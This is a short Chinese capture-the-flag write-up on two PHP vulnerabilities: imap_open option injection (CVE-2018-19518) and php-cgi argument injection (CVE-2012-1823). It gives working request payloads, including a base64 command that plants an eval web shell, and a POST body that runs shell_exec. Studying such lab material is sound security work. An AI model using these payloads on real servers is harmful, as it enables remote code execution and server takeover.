ctfshow-phpcve

web312(CVE-2018-19518)-PHP-IMAP

php imap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell，而debian/ubuntu中默认使用ssh来代替rsh的功能（也就是说，在debian系列系统中，执行rsh命令实际执行的是ssh命令）。
因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令，攻击者通过注入注入这个参数，最终将导致命令执行漏洞。

影响：

PHP：5.6.38
系统：Debian/ubuntu
条件较高

hostname=x+-oProxyCommand%3decho%09这里放执行的代码|base64%09-d|sh}a&username=1&password=1

hostname=x+-oProxyCommand%3decho%09ZWNobyAnPD9waHAgZXZhbCgkX1BPU1RbJzEnXSk7JyA+IC92YXIvd3d3L2h0bWwvMS5waHA=|base64%09-d|sh}a&username=1&password=1

web313(CVE-2012-1823)

CGI模式下的参数：
-c 指定php.ini文件的位置
-n 不要加载php.ini文件
-d 指定配置项
-b 启动fastcgi进程
-s 显示文件源码
-T 执行指定次该文件
-h和-？ 显示帮助

在这里插入图片描述

-d 执行命令

index.php?-d+allow_url_include%3don+-d+auto_prepend_file%3dphp%3a//input
post:
<?php echo shell_exec('id');?>